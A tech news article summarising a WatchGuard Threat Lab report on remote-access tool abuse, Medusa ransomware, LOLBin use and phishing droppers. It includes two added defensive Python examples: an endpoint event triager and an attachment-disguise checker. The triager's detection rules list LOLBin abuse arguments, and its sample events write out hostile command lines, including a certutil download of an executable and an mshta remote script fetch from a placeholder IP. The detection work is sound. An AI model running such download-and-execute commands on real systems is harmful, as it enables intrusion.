CIO Influence

WatchGuard Threat Lab Report Reveals Surge in Exploits Targeting Remote Access Software

Key findings: an 89% surge in endpoint ransomware attacks and a decline in malware delivered over encrypted connections

The latest quarterly Internet Security Report from WatchGuard Technologies, compiled by the WatchGuard Threat Lab, highlights three trends: growing abuse of legitimate remote access software, heavier use of password-stealers and info-stealers to harvest credentials, and a shift by threat actors away from scripting toward other living-off-the-land techniques for launching endpoint attacks. Together they show how quickly attacker tradecraft changes and why both network and endpoint defenses need continuous attention.

“Threat actors continue using different tools and methods in their attack campaigns, making it critical for organizations to keep abreast of the latest tactics to fortify their security strategy. Modern security platforms that include firewalls and endpoint protection software can deliver enhanced protection for networks and devices. But when it comes to attacks that employ social engineering tactics, the end user becomes the last line of defense between malicious actors and their success in infiltrating an organization. It’s important for organizations to provide social engineering education as well as adopt a unified security approach that provides layers of defense, which can be administered effectively by managed service providers.”

Corey Nachreiner, Chief Security Officer at WatchGuard

Key Findings from the Internet Security Report

Increased Utilization of Remote Management Tools by Threat Actors

The report highlights a growing trend of threat actors using legitimate remote management tools to bypass anti-malware controls, a technique the FBI and CISA have also warned about. Because such tools are commercially signed, widely deployed software, they pass the checks that would catch a custom remote access trojan. The Threat Lab observed a tech support scam in which victims were led to download an unauthorized version of TeamViewer, giving the attackers complete remote access to the victim’s computer.

Surge in Medusa Ransomware Variant

Headline endpoint ransomware detections appeared to fall in Q3, but the Medusa ransomware variant surged and surfaced in the Top 10 malware threats. When those Medusa detections are counted as ransomware, endpoint ransomware attacks rose 89% quarter over quarter.

Shift in Attack Techniques

Threat actors are moving away from script-based attacks toward other living-off-the-land techniques. Malicious scripts remained the leading endpoint attack vector in Q3 but declined 11%, while attacks using Windows living-off-the-land binaries (LOLBins) rose 32%. The shift suggests attackers are adapting to the stronger protections now applied to scripting languages by leaning on signed, built-in system binaries that are harder to block outright.
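Both the remote-access-tool abuse described under the previous heading and the LOLBin shift described here leave traces in endpoint process-creation telemetry. The following is an added example written for this article, not WatchGuard code or detection content from the report: it applies three constructed rules to constructed Sysmon-style process-creation events (a remote access tool running outside its managed install path, a LOLBin invoked with a download or decode argument, and an Office application spawning an interpreter). The install paths, the LOLBin names and argument fragments, and the events themselves are assumptions chosen for illustration.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Remote-access tools and the install directory they are expected to run from.
# The directories are assumptions for this example, not vendor guidance.
REMOTE_ACCESS_TOOLS = {
    "teamviewer.exe": "c:\\program files\\teamviewer\\",
    "anydesk.exe": "c:\\program files (x86)\\anydesk\\",
}

# Windows LOLBins with command-line fragments that, in these constructed rules,
# indicate download/decode/remote-script abuse rather than routine use.
LOLBIN_RULES = {
    "certutil.exe": ("-urlcache", "-decode"),
    "mshta.exe": ("http://", "https://", "javascript:", "vbscript:"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "rundll32.exe": ("javascript:", "http://", "https://"),
    "bitsadmin.exe": ("/transfer",),
}

# User-writable locations a freshly downloaded binary typically lands in.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe"}


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def triage_event(event: dict) -> list:
    """Apply the three rules to one process-creation event."""
    image = event["image"].lower()
    name = _basename(image)
    parent = _basename(event.get("parent_image", ""))
    cmd = event.get("command_line", "").lower()
    findings = []

    # Rule 1: remote-access tool running outside its managed install path
    # (the tech-support-scam pattern: a user-downloaded copy in Downloads).
    if name in REMOTE_ACCESS_TOOLS and not image.startswith(REMOTE_ACCESS_TOOLS[name]):
        where = "user-writable" if any(m in image for m in USER_WRITABLE) else "unexpected"
        findings.append(Finding(event["id"], "rmm-unmanaged-path",
                                f"{name} launched from {where} path {event['image']}"))

    # Rule 2: LOLBin invoked with an abuse-indicating argument.
    if name in LOLBIN_RULES:
        hits = [frag for frag in LOLBIN_RULES[name] if frag in cmd]
        if hits:
            findings.append(Finding(event["id"], "lolbin-abuse",
                                    f"{name} with {', '.join(hits)}"))

    # Rule 3: Office application spawning a script host or LOLBin.
    if parent in OFFICE_APPS and (name in SCRIPT_HOSTS or name in LOLBIN_RULES):
        findings.append(Finding(event["id"], "office-spawns-interpreter",
                                f"{parent} -> {name}"))
    return findings


def triage(events: list) -> list:
    """Run every event through the rules, preserving event and rule order."""
    return [f for e in events for f in triage_event(e)]


# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files\TeamViewer\TeamViewer.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "TeamViewer.exe"},
    {"id": 2, "image": r"C:\Users\alice\Downloads\TeamViewer.exe",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "TeamViewer.exe"},
    {"id": 3, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe"},
    {"id": 4, "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -verify server.cer"},
    {"id": 5, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "mshta.exe https://203.0.113.5/launch.hta"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: [{f.rule}] {f.detail}")
```

Event 4 (certutil verifying a certificate) is deliberately benign: the point of keying LOLBin rules on argument fragments rather than on the binary name is that blocking or alerting on every certutil or rundll32 launch is not workable on a Windows fleet. Rule 1 is the one that catches the TeamViewer scenario from the report, since the sanctioned install and the user-downloaded copy are the same signed binary and differ only in where they run from.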

Decrease in Malware via Encrypted Connections

The share of malware arriving over encrypted connections fell to 48% in Q3, a notable drop from previous quarters, even though total malware detections rose 14%. Malware delivered over TLS is invisible to perimeter controls that do not decrypt and inspect that traffic, so nearly half of the quarter’s malware would have passed an uninspecting gateway unseen.

Email-Based Dropper Family

One email-based dropper family, Stacked, accounted for four of the Top 5 encrypted malware detections in Q3. Its operators relied on spearphishing: emails carrying malicious attachments disguised as legitimate documents to trick recipients into downloading the malware.
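The disguised-attachment technique above can be checked before a file reaches a user. The following is an added example, not code from WatchGuard or the report: it inspects an attachment’s filename and leading bytes for the common disguises (a document extension in front of an executable one, a right-to-left override character, executable content behind a document extension, and a VBA macro project inside an OOXML container). All sample filenames and bytes are constructed; the page does not describe the Stacked family’s actual attachments, so nothing here is specific to it.

```python
import io
import zipfile
from dataclasses import dataclass, field

# Leading bytes (file signatures) for the content types this checker sniffs.
MAGIC = {
    "pe": b"MZ",                                  # Windows executable
    "pdf": b"%PDF-",
    "ole": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",  # legacy .doc/.xls (OLE2)
    "zip": b"PK\x03\x04",                         # OOXML .docx/.xlsx are zips
}
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt"}
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "js", "vbs", "hta", "lnk", "msi"}
OOXML_EXTS = {"docx", "xlsx", "pptx", "docm", "xlsm", "pptm"}
RLO = "\u202e"  # right-to-left override: "Contract\u202efdp.scr" displays as "Contractrcs.pdf"


@dataclass
class Verdict:
    filename: str
    content: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def sniff(data: bytes) -> str:
    """Identify content by its leading bytes, ignoring the claimed extension."""
    for kind, magic in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def inspect_attachment(filename: str, data: bytes) -> Verdict:
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner_exts = set(parts[1:-1])  # extensions buried before the real one
    content = sniff(data)
    v = Verdict(filename, content)

    # 1. Filename tricks: RLO character, or "Invoice.pdf.exe"-style double extension.
    if RLO in filename:
        v.reasons.append("right-to-left override character in filename")
    if ext in EXECUTABLE_EXTS and inner_exts & DOCUMENT_EXTS:
        v.reasons.append(f"document extension hides executable .{ext}")

    # 2. Content does not match the document extension it claims.
    if ext in DOCUMENT_EXTS and content == "pe":
        v.reasons.append("PE executable content behind document extension")
    if ext in OOXML_EXTS and content == "ole":
        v.reasons.append("legacy OLE document renamed to an OOXML extension")

    # 3. OOXML container: look inside the zip for a VBA macro project.
    if ext in OOXML_EXTS and content == "zip":
        try:
            names = zipfile.ZipFile(io.BytesIO(data)).namelist()
        except zipfile.BadZipFile:
            v.reasons.append("claims OOXML but is not a readable zip")
        else:
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                v.reasons.append("embedded VBA macro project (vbaProject.bin)")
    return v


def build_ooxml(entries: list) -> bytes:
    """Build a minimal OOXML-like zip in memory (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        for name in entries:
            z.writestr(name, b"")
    return buf.getvalue()


# Constructed attachments: names and bytes are made up for this example.
SAMPLES = [
    ("Invoice_2023-09.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"),
    ("Invoice_2023-09.pdf.exe", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("Statement.pdf", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("Report.docx", build_ooxml(["word/document.xml", "word/vbaProject.bin"])),
    ("Contract" + RLO + "fdp.scr", b"MZ\x90\x00\x03\x00\x00\x00"),
]


def triage_attachments(samples=SAMPLES) -> dict:
    return {name: inspect_attachment(name, data) for name, data in samples}


if __name__ == "__main__":
    for name, verdict in triage_attachments().items():
        flag = "SUSPICIOUS" if verdict.suspicious else "ok"
        print(f"{flag:10} {name!r} ({verdict.content}): {'; '.join(verdict.reasons)}")
```

The checks are ordered so that the cheapest signal (the filename) is evaluated before any content parsing, and the zip is only opened when the extension and the magic bytes both say OOXML. Sniffing the leading bytes matters because a mail gateway that trusts the extension, or the sender-supplied MIME type, is exactly what a "document" that is really a PE file is built to get past.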

Emergence of Commoditized Malware

A new malware family, Lazy.360502, appeared among the top threats, delivering the 2345explorer adware variant and the Vidar password stealer. The family was linked to a Chinese website that sells stolen credentials as a service, an illustration of how malware and its proceeds have become a commodity.

Network Attack Trends

Network attacks rose 16% in Q3. ProxyLogon, the Microsoft Exchange Server vulnerability for which Microsoft released patches in March 2021, was the most targeted flaw, accounting for 10% of all network detections; attackers are still finding unpatched or exposed servers more than two years later.

New Signatures in Top 50 Network Attacks

Three new signatures entered the Top 50 network attacks, covering vulnerabilities in PHP, the Microsoft .NET Framework, and Drupal, each of which could be used for a critical exploit.

The findings in this quarterly Threat Lab report align with WatchGuard’s Unified Security Platform strategy. The data is drawn from anonymized, aggregated threat intelligence collected from active WatchGuard network and endpoint products whose owners have opted in to share it, which directly supports the Threat Lab’s ongoing research.

FAQs

1. What specific trends in cyber threats did the report emphasize?
The report notes a rising trend in threat actors utilizing remote management tools, shifting from script-based attacks to living-off-the-land techniques, and decreasing malware delivered through encrypted connections.

2. What was the significant rise in ransomware attacks mentioned in the report?
The Medusa ransomware variant drove an 89% increase in endpoint ransomware attacks, even though headline endpoint ransomware detections appeared to decrease before the Medusa detections were counted.

3. What were the notable malware families highlighted in the report?
The report highlighted the Stacked email-based dropper family and the new Lazy.360502 family, which was linked to a Chinese website selling stolen credentials, illustrating the commoditization of malware.
